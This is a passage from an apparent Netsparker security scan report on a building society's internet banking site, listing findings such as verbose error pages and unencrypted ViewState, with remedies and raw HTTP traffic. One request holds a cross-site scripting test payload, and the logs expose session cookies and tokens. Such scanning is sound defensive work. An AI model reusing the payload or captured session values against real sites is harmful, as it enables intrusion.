     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /Discovery/FullFlex/ApplicationRemote.aspx

/Discovery/FullFlex/ApplicationRemote.aspx

https://olb2.nationet.com/Discovery/FullFlex/ApplicationRemote.aspx?ID='%22--%3E%3C/style%3E%3C/scri..

Parameters

Parameter Type Value
ID GET '"--></style></script><script>netsparker(0x0000E1)</script>
GssToken GET 137240216200001lowzkvvgwwsrtpehwa1hcgzyWwwpMZ5nN9I*0d2GfW*Bqk8KBn4FecHGBCM*Rof9DeON/FTjxWndffvzxO6R*eUD

Request

GET /Discovery/FullFlex/ApplicationRemote.aspx?ID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E1)%3C/script%3E&GssToken=137240216200001lowzkvvgwwsrtpehwa1hcgzyWwwpMZ5nN9I*0d2GfW*Bqk8KBn4FecHGBCM*Rof9DeON%2fFTjxWndffvzxO6R*eUD HTTP/1.1
Referer: https://olb2.nationet.com/MyApplications/UnregisteredApplication.aspx?ID=3e16672fbeb645421c949ea4d5f68261e40&apptype=FLEXACCOUNT
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: olb2.nationet.com
Cookie: ASPSESSIONIDCAATARTS=BLMLIEGDLGCKJBEIBMLCBLMK; SessionTokenIdentifier=4434624482; CookieValidator=0; ASPSESSIONIDCAARCRRS=POGEJLADGAFGDEILEDCHKKNK; ASPSESSIONIDCSCRAQTQ=DNPLCBKDLGAPIIGIGMFOBOCL; ASPSESSIONIDAACRARSS=LCFMKEFDFNKKAHJFEHOLMBCN; ASP.NET_SessionId=a2ryhtbsoil0nnighlb24l45; ASPSESSIONIDAQDTDSQR=APDFCGIDNJBGDGMCIOHNHMNB; ASPSESSIONIDAACQBTSS=FBFJFDIDAOMEFFIJPLDGKCLN; ASPSESSIONIDAACSARST=EOPDDBKDMIPGPPPELLNLHJIF; ASPSESSIONIDCACRARSS=OJKPEEIDEGJCOAFIBLEAIFHN; ASPSESSIONIDCSDRBTRR=DKKJEIJDCDPJKDOLFIKDGEKD; ASPSESSIONIDCAARDSRS=DBIMLLADJCCNHLBCHNNNGCOI; ASPSESSIONIDCQCQDSRQ=FIKGNOADGNFBDEFBPBBFEIBN; ASPSESSIONIDAQATDTRQ=HCLINOADFMCFBJFFICAKOAOK; ASPSESSIONIDAADSCSQT=HCNNPDEDKJEALNAFMMLPEKFC; ASPSESSIONIDAQDTCTQR=OKCIBGDDMOEBOENOAGADLGEP; ASPSESSIONIDACBRDSQT=OFLDBLJDGHDLMBDAEADNMLCE; ASPSESSIONIDCSCTBTRQ=ENJIMOADIPAGMBCGDKDPKNLO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 6901
Content-Type: text/html; charset=utf-8
p3p: CP=ALL DSP COR CURa TAIi PSAa OUR BUS PHY ONL UNI FIN COM NAV DEM HEA PRE OTC
Date: Tue, 03 May 2011 01:11:32 GMT


<html>
<head>
<title>A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/Discovery' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>Request Validation has detected a potentially dangerous client input value, and processing of the request has been aborted. This value may indicate an attempt to compromise the security of your application, such as a cross-site scripting attack. You can disable request validation by setting validateRequest=false in the Page directive or in the <pages> configuration section. However, it is strongly recommended that your application explicitly check all inputs in this case.
<br><br>

<b> Exception Details: </b>System.Web.HttpRequestValidationException: A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[HttpRequestValidationException (0x80004005): A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).]
System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +3308446
System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName) +108
System.Web.HttpRequest.get_QueryString() +119
System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull) +2070504
System.Web.UI.Page.DeterminePostBackMode() +63
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +6978
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +213
System.Web.UI.Page.ProcessRequest() +86
System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context) +18
System.Web.UI.Page.ProcessRequest(HttpContext context) +49
ASP.fullflex_applicationremote_aspx.ProcessRequest(HttpContext context) +29
System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +303
System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously) +64
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.832; ASP.NET Version:2.0.50727.832

</font>

</body>
</html>
<!--
[HttpRequestValidationException]: A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).
at System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName)
at System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName)
at System.Web.HttpRequest.get_QueryString()
at System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull)
at System.Web.UI.Page.DeterminePostBackMode()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.fullflex_applicationremote_aspx.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
ViewState is not Encrypted

ViewState is not Encrypted

1 TOTAL
LOW
Netsparker identified that the target web application doesn't use encryption on ViewState data.

Impact

An attacker can study the application's state management logic for possible vulnerabilities and if your application stores application-critical information in the ViewState; it will also be revealed.

Remedy

ASP.NET provides encryption for ViewState parameters.

For page based protection, place the following directive at the top of affected page.
<%@Page ViewStateEncryptionMode="Always" %>
You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file.
<System.Web>
	<pages viewStateEncryptionMode="Always"> 
</System.Web>      

Remedy References

- /AppServices/SignOn/SignOnProcess/Default.aspx

/AppServices/SignOn/SignOnProcess/Default.aspx

https://olb2.nationet.com/AppServices/SignOn/SignOnProcess/Default.aspx?ID=35

ViewState Version

.NET Framework 2.x

Request

GET /AppServices/SignOn/SignOnProcess/Default.aspx?ID=35 HTTP/1.1
Referer: https://olb2.nationet.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: olb2.nationet.com
Cookie: ASPSESSIONIDCAATARTS=BLMLIEGDLGCKJBEIBMLCBLMK; SessionTokenIdentifier=0396747136; CookieValidator=0; ASPSESSIONIDCAARCRRS=POGEJLADGAFGDEILEDCHKKNK; ASPSESSIONIDCSCRAQTQ=DNPLCBKDLGAPIIGIGMFOBOCL; ASPSESSIONIDAACRARSS=ACFMKEFDGOFEOHIOFLKKLBAA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Length: 12803
Content-Type: text/html; charset=utf-8
p3p: CP=ALL DSP COR CURa TAIi PSAa OUR BUS PHY ONL UNI FIN COM NAV DEM HEA PRE OTC
Set-Cookie: ASP.NET_SessionId=tembcg455e5n0mmde0go4g45; path=/; HttpOnly,SessionTokenIdentifier=3548343233; path=/
Date: Tue, 03 May 2011 01:10:27 GMT



<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>
Nationwide Building Society - Internet Banking
</title>

<script type="text/javascript" src="/CommonFiles/javascript/commonScripts.js"></script>

<script language="javascript" type="text/javascript">
function ShowHelp()
{
// will always open in centre of screen, regardless of screen resolution
var popUpWidth = 640;
var popUpHeight = 480;
var x = ((screen.width - popUpWidth)/2);
var y = ((screen.height - popUpHeight)/2);
window.status='Sign On';

window.open('http://www.nationwide.co.uk/internetbanking/help/help_frameset.asp?helpPageID=help_signon_WP1.htm', 'helpWindow', 'status,HEIGHT='+popUpHeight+',WIDTH='+popUpWidth+',top='+y+',left='+x+',screenX='+x+',screenY='+y+', scrollbars=yes, resizable=yes');
}

function ShowDemo()
{
parent.location.href=('http://www.nationwide.co.uk/internet_banking/demo/default.htm');
}
</script>
<style type="text/css">
body { overflow: auto; }
</style>
<meta name="ngm_IPAddress" content="173.193.214.243">
<meta name="ngm_ProdType" content="InitiateSignOn">
<meta name="ngm_CID" content="">
<meta name="ngm_PgDesc" content="InitiateSignOn">
<script language="javascript" src="/CommonFiles/javascript/NBS_script.js"></script>
<link href="/styleSheets/tableless/header.css" type="text/css" rel="Stylesheet" media="all" /><link href="/styleSheets/tableless/header_Style1.css" type="text/css" rel="Stylesheet" media="all" /><link href="/styleSheets/Style1.css" type="text/css" rel="Stylesheet" media="all" /><link href="/styleSheets/sign-on.css" type="text/css" rel="Stylesheet" media="all" /></head>

<body id="ctl00_SignOnBody" class="framelessPage" Onload="PageLoadEvents();">
<form name="aspnetForm" method="post" action="InitiateSignOn.aspx?ID=35" id="aspnetForm" autocomplete="off">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTgyODI5MzU4OQ9kFgJmD2QWAgIDDxYCHgZPbmxvYWQFEVBhZ2VMb2FkRXZlbnRzKCk7FgICAQ9kFgICAQ9kFgZmDw8WAh4EVGV4dAW9BTx1bCBpZD0nbWVudWl0ZW1zJz48bGkgY2xhc3M9J2FjdGl2ZUl0ZW0nPlNpZ24gT248L2xpPjxsaT48YSBocmVmPScvc2lnbm9uL1JlZ2lzdHJhdGlvbjIuYXNwJz5SZWdpc3RlciBGb3IgU2VydmljZTwvYT48L2xpPjxsaT48YSBocmVmPSMgb25jbGljaz0iU09XUDFfb3BlbldpbmRvdygwKTsiPkZvcmdvdHRlbiBZb3VyIERldGFpbHM8L2E+PC9saT48bGk+PGEgaHJlZj0jIG9uY2xpY2s9IlNPV1AxX29wZW5XaW5kb3coMyk7Ij5Ucm91Ymxlc2hvb3Rpbmc8L2E+PC9saT48bGk+PGEgaHJlZj0jIG9uY2xpY2s9IlNPV1AxX29wZW5XaW5kb3coMSk7Ij5TZXJ2aWNlIEF2YWlsYWJpbGl0eTwvYT48L2xpPjxsaT48YSBocmVmPSMgb25jbGljaz0iU09XUDFfb3BlbldpbmRvdygyKTsiPlNlY3VyaXR5PC9hPjwvbGk+PGxpPjxhIGhyZWY9IyBvbmNsaWNrPSJTT1dQMV9vcGVuV2luZG93KDcpOyI+VGVybXMgJmFtcDsgQ29uZGl0aW9uczwvYT48L2xpPjxsaT48YSBocmVmPSMgb25jbGljaz0id2luZG93Lm9wZW4oJ1xvcmRlcmNhcmRyZWFkZXIuYXNweD9JRD0zNScsJ1BvcFVwJywnd2lkdGg9Nzg1LGhlaWdodD01NTAsc2NyZWVuWD0wLHNjcmVlblk9MCx0b3A9MjAsbGVmdD0yMCx0b29sYmFyPXllcyxtZW51YmFyPXllcyxzY3JvbGxiYXJzLHJlc2l6YWJsZT15ZXMsc3RhdHVzJyk7Ij5PcmRlciBDYXJkIFJlYWRlcjwvYT48L2xpPjwvdWw+ZGQCBA8PZBYCHgdvbmNsaWNrBUVfX2RvUG9zdEJhY2soJ2N0bDAwJGNwaE1haW5Db250ZW50JGJ0blN1Ym1pdCcsJycpO3RoaXMuZGlzYWJsZWQ9dHJ1ZTtkAgYPDxYEHgZUYXJnZXQFBl9ibGFuax4LTmF2aWdhdGVVcmwFM2h0dHA6Ly93d3cubmF0aW9ud2lkZS5jby51ay9zYXZpbmdzL2Fib3V0bXlzYXZlLmh0bWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBSZjdGwwMCRjcGhNYWluQ29udGVudCRjaGtib3hSZW1lbWJlck51bcik79mcxbuQHBI/ULCjsoPpmtj4" />
</div>

<script type="text/javascript">
<!--
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
// -->
</script>


<div id="headerframe">
<div id="header-info">
<div id="nbslogo">
<a href="http://www.nationwide.co.uk" target="_top" onmouseover="window.status='Nationwide home page';return true;" onmouseout="window.status='';return true;" ><img src="/Images/nbslogo_dec08.gif" alt="Nationwide home page" /></a>
</div>
<h1>Internet Banking</h1>
</div>

<div id="header-nav">
<p id="header-blurb">Welcome to Nationwide's Internet Banking</p>
<ul id="header-nav-secondary">
<li><a href="javascript:ShowDemo();" onmouseover="window.status='Demonstration of this site';return true;" onmouseout="window.status='';return true;" title="Demonstration of this site"><b>Demo</b></a></li>
<li><a href="javascript:ShowHelp();" onmouseover="window.status='View help topics for this page';return true;" onmouseout="window.status='';return true;" title="View help topics for this page"><b>Help</b></a></li>
</ul>
</div>
</div>
<div id="main-content" style="position:absolute; top:115px;" >

<script type="text/javascript">
function msg1() {window.status="Please enter your 10-digit Customer Number"}

function PageLoadEvents()
{
document.aspnetForm.ctl00_cphMainContent_txtScreenResolution.value = screen.width + " x " + screen.height;
document.aspnetForm.ctl00_cphMainContent_txtPersistentCookies.value = persistentCookiesEnabled();
var visitortime = new Date();
var timeZone = ""
if (visitortime)
{
document.aspnetForm.ctl00_cphMainContent_txtTimeZone.value = (-(visitortime.getTimezoneOffset()/60));
}
document.aspnetForm.ctl00_cphMainContent_txtReferringUri.value = document.referrer;
document.aspnetForm.txt3548343233.focus();


checkforcookie();


}

function persistentCookiesEnabled()
{
var cookieName = "OlbTempTestCookie";
var expireDate = new Date();
expireDate.setDate(expireDate.getDate() + 2);
document.cookie = cookieName + "=" + cookieName +"; path=/; expires=" + expireDate.toGMTString();
var start = document.cookie.indexOf(cookieName + "=" + cookieName);
if (document.cookie.indexOf(cookieName + "=" + cookieName) > -1)
{
document.cookie = cookieName + "=; path=/; expires=Thu, 01-Jan-1970 00:00:01 GMT";
return true;
}
return false;
}

function getCookie(sCookieName)
{
var aCookie = document.cookie.split("; ");

for (var i=0; i < aCookie.length; i++)
{
var thisCookie = aCookie[i].split("=");

if (sCookieName == thisCookie[0])
return unescape(thisCookie[1]);
}

return '';
}

function checkforcookie ()
{
var strCustomerNum = '';
strCustomerNum = getCookie("CIS");
if(strCustomerNum.length == 10)
{
document.aspnetForm.txt3548343233.value = strCustomerNum;
document.getElementById("ctl00_cphMainContent_chkboxRememberNum").checked = true;
}
}
</script>
<script type="text/javascript" src="/SignOn/javascript/add-event.js"></script>

<table width="100%" border="0" cellspacing="0" cellpadding="0" id="table1">
<tr>
<td width="5"><img src="/Images/pixel.gif" width="5" height="1" alt="" /></td>
<td valign="top">
<!-- Start of Navigation links -->
<span class='doNotPrint'>
<div id='menu'>
<div id='menuHdr'>INTERNET BANKING</div>
<span id="ctl00_cphMainContent_lblMenu"><ul id='menuitems'><li class='activeItem'>Sign On</li><li><a href='/signon/Registration2.asp'>Register For Service</a></li><li><a href=# onclick="SOWP1_openWindow(0);">Forgotten Your Details</a></li><li><a href=# onclick="SOWP1_openWindow(3);">Troubleshooting</a></li><li><a href=# onclick="SOWP1_openWindow(1);">Service Availability</a></li><li><a href=# onclick="SOWP1_openWindow(2);">Security</a></li><li><a href=# onclick="SOWP1_openWindow(7);">Terms &amp; Conditions</a></li><li><a href=# onclick="window.open('\ordercardreader.aspx?ID=35','PopUp','width=785,height=550,screenX=0,screenY=0,top=20,left=20,toolbar=yes,menubar=yes,scrollbars,resizable=yes,status');">Order Card Reader</a></li></ul></span>
</div>
</span>
<!-- End of Navigation links -->

<!--Add new security link -->
<br />
<a href="#" onclick="SOWP1_openWindow(4);"><img alt="*" src="/Images/ad3.gif" border="0" /></a>
<!-- End of new security promise code -->
</td>
<td width="5">
<img src="/Images/pixel.gif" width="5" height="1" alt="" />
</td>
<td width="100%" valign="top">

<!--TITLE> box-->
<div id="sign-on-options">
<div id="sign-on-cn">
<h2>Sign on to my Internet Banking</h2>

<span id="ctl00_cphMainContent_lblRcaErrorText"></span>

<div id="sign-on-cn-main" class="">
<span id="ctl00_cphMainContent_lblRcaErrorField"></span>
<div class="content">
<label for="txt3548343233">Enter your customer number</label>
<div class="question-set">
<input name="txt3548343233" type="text" maxlength="10" id="txt3548343233" tabindex="1" class="input" size="14" width="100" OnFocus="msg1()" />
<input style="display: none" />
<input type="submit" name="ctl00$cphMainContent$btnSubmit" value="Continue >>" onclick="__doPostBack('ctl00$cphMainContent$btnSubmit','');this.disabled=true;" id="ctl00_cphMainContent_btnSubmit" tabindex="2" />
</div>

<div class="question-set">
<label for="chkboxRememberName" class="checkbox"><input id="ctl00_cphMainContent_chkboxRememberNum" type="checkbox" name="ctl00$cphMainContent$chkboxRememberNum" onclick="javascript:setTimeout('__doPostBack(\'ctl00$cphMainContent$chkboxRememberNum\',\'\')', 0)" tabindex="3" /> Remember my customer number*</label>
<p>*Only select this if this is your computer and it is not used by anyone else</p>

</div>

</div>
</div>
<p class="warning">For security reasons, when you have finished using Internet Banking always select SIGN OFF.</p>
</div>
<div id="sign-on-my-save">
<h2>Sign on to MySave</h2>
<div id="my-save-info">
<img src="/images/my-save.gif" alt="MySave Online Savings - Manage your MySave account online" />
<a id="ctl00_cphMainContent_linkWhatsThis" href="http://www.nationwide.co.uk/savings/aboutmysave.htm" target="_blank">What is MySave?</a>
</div>
<div id="my-save-sign-on">
<p>Sign on to your MySave account</p>
<input type="submit" name="ctl00$cphMainContent$btnMySave" value="Go to MySave >>" id="ctl00_cphMainContent_btnMySave" tabindex="3" class="button" />
</div>
</div>
</div>

</td>
<!--Final White Spacing column gap-->
<td width="5"><img src="/Images/pixel.gif" width="5" height="1" alt="" /></td>
</tr>
</table>

<input type="hidden" name="ctl00$cphMainContent$txtScreenResolution" id="ctl00_cphMainContent_txtScreenResolution" />
<input type="hidden" name="ctl00$cphMainContent$txtPersistentCookies" id="ctl00_cphMainContent_txtPersistentCookies" />
<input type="hidden" name="ctl00$cphMainContent$txtTimeZone" id="ctl00_cphMainContent_txtTimeZone" />
<input type="hidden" name="ctl00$cphMainContent$txtReferringUri" id="ctl00_cphMainContent_txtReferringUri" />


</div>

<div>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWCQKk9oPRDAKc1NGXDgKequbgAgKFg47fDgKozL+oDAKh8OOtAQLs68+tCgLC6q+pCgL0ieNki25JGPHWGsp/oyPe+PC3WUDdRUE=" />
</div></form>
</body>
</html>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /Discovery/FullFlex/

/Discovery/FullFlex/ CONFIRMED

https://olb2.nationet.com/Discovery/FullFlex/

Request

GET /Discovery/FullFlex/ HTTP/1.1
Referer: https://olb2.nationet.com/Discovery/FullFlex/ApplicationRemote.aspx?ID=3e16672fbeb645421c949ea4d5f68261e40&GssToken=137240216200001lowzkvvgwwsrtpehwa1hcgzyWwwpMZ5nN9I*0d2GfW*Bqk8KBn4FecHGBCM*Rof9DeON%2fFTjxWndffvzxO6R*eUD
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: olb2.nationet.com
Cookie: ASPSESSIONIDCAATARTS=BLMLIEGDLGCKJBEIBMLCBLMK; SessionTokenIdentifier=5764368434; CookieValidator=0; ASPSESSIONIDCAARCRRS=POGEJLADGAFGDEILEDCHKKNK; ASPSESSIONIDCSCRAQTQ=DNPLCBKDLGAPIIGIGMFOBOCL; ASPSESSIONIDAACRARSS=ACFMKEFDGOFEOHIOFLKKLBAA; ASP.NET_SessionId=wecysn55ttveaf45j1wpoanj; ASPSESSIONIDAQDTDSQR=APDFCGIDNJBGDGMCIOHNHMNB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Cache-Control: No-cache
Content-Length: 210
Content-Type: text/html
Expires: -1
p3p: CP=ALL DSP COR CURa TAIi PSAa OUR BUS PHY ONL UNI FIN COM NAV DEM HEA PRE OTC
Date: Tue, 03 May 2011 01:10:28 GMT


<html><head><title>Error</title></head><body><head><title>Application Pool Access Denied</title></head><body><h1>The specified request cannot be executed from current Application Pool</h1></body></body></html>